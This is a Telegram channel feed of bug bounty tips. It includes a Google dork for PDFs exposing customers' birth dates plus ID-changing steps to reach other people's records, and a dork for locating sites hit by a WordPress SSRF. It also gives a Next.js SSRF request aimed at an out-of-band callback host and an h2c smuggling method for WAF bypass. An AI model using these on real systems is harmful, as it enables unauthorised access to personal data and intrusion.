Brut Security
14.6K subscribers
907 photos
73 videos
287 files
962 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
Hey Hunter's,
DarkShadow here back again, just dropping a awesome dork that makes pure bounty!

Unauthenticated Access to Sensitive Customer Data via Google Dorking

βœ…Step to reproduce:

- dork:
  site:*.target.com* "date of birth" ext:pdf
- Check if PDF file exposing customer data.
- Noticed the ID in the URL.
- if By changing the ID, you able to access other data.

Result: IDOR+Sensitive info leak (such as customer data)



Now guys let me know, you are want to know all dorks that make pure bounty?

If you guy's want then show your love, probably i made a tool for automation or post the method.

Follow for More x.com/darkshadow2bd

#bugbountytips #dork #idor
πŸ”₯11❀10πŸ‘6🫑3
CVE-2025-8085: SSRF in Ditty WordPress plugin, 8.6 rating❗️

The vulnerability allows attackers without authentication to make requests to arbitrary URLs.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/HthP0
πŸ‘‰ Dork: http.body:"plugins/ditty-news-ticker"

Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
πŸ‘8🀝1
Hey Hunter's,
DarkShadow here back again, dropping a critical SSRF πŸ’₯

Nextjs SSRF in Middleware header!
βœ…POC:

GET / HTTP/1.1
Host: target. com
Location: https://oast. me
X-Middleware-Rewrite: https://oast. me


If you guy's really enjoy to read, then show your love and follow me x.com/darkshadow2bd

#ssrf #bugbountytips
πŸ‘18❀14πŸ”₯4πŸ—Ώ1
Bug Bounty Checklist.pdf
149.5 KB
πŸ”₯21πŸ‘6❀5
Hey Hunter's,
DarkShadow here back again!

Check your burp isn't this feature is enable?

Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.

#bugbountytips #burp
1❀8πŸ‘7πŸ‘4πŸ”₯2
πŸͺ² Bug Bounty Pro Tip: #H2C Upgrade Bypass

Target: Applications using HTTP/2 Cleartext (h2c) upgrades.

The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.

How to Test:

1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).

2. Send an initial HTTP/1.1 request with the upgrade header:

GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade

3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.

4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.

Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.

#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
1πŸ”₯29❀14πŸ‘5
dON'T fORGET tO gIVE rEACTIONS
❀26πŸ”₯6😁4πŸ—Ώ1
⚑Sn1per - Automate your recon like never before!

βœ… https://github.com/1N3/Sn1per
πŸ”₯19❀9😱2
⚑S3Scan - A powerful S3 bucket security scanner designed for penetration testing and bug bounty hunting. This tool automatically detects misconfigurations and security vulnerabilities in AWS S3 buckets.

βœ…https://github.com/KingOfBugbounty/s3tk
πŸ‘20❀6πŸ‘¨β€πŸ’»2
Mobile Hacking Bug Bounty.pdf
4.4 MB
Mobile Hacking Bug Bounty: The Practical Checklist
1πŸ‘18πŸ”₯10❀2πŸ‘2🐳1
⚑Bug Bounty Reports Extractor - CLI tool that fetches resolved & disclosed HackerOne reports by vulnerability and exports them to CSV.

βœ…
https://github.com/newstartlikenoneanthor-pixel/report-extractor
❀17πŸ”₯6😱2
😁56πŸ‘5πŸ—Ώ2πŸ‘¨β€πŸ’»1🫑1
⚑️Recently updated Proof-of-Concepts

βœ”οΈLink to Download - https://github.com/0xMarcio/cve
Please open Telegram to view this post
VIEW IN TELEGRAM
❀17πŸ”₯5πŸ‘4πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
β˜„οΈFind new associated domains with this simple Google dork:

"Β© <COMPANY>. all rights reserved." -".<COMPANY>.com"
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯17❀7πŸ‘4😱1
dON'T fORGET tO gIVE rEACTIONS
❀22πŸ—Ώ8πŸ”₯2🀨2
Hey Hunter's,
DarkShadow here back again!

A hidden backdoor was in PHP version which allow remote code execution In user-agent header.

Guess Guy's which version it is?

#backdoor
❀19😁2πŸ‘¨β€πŸ’»1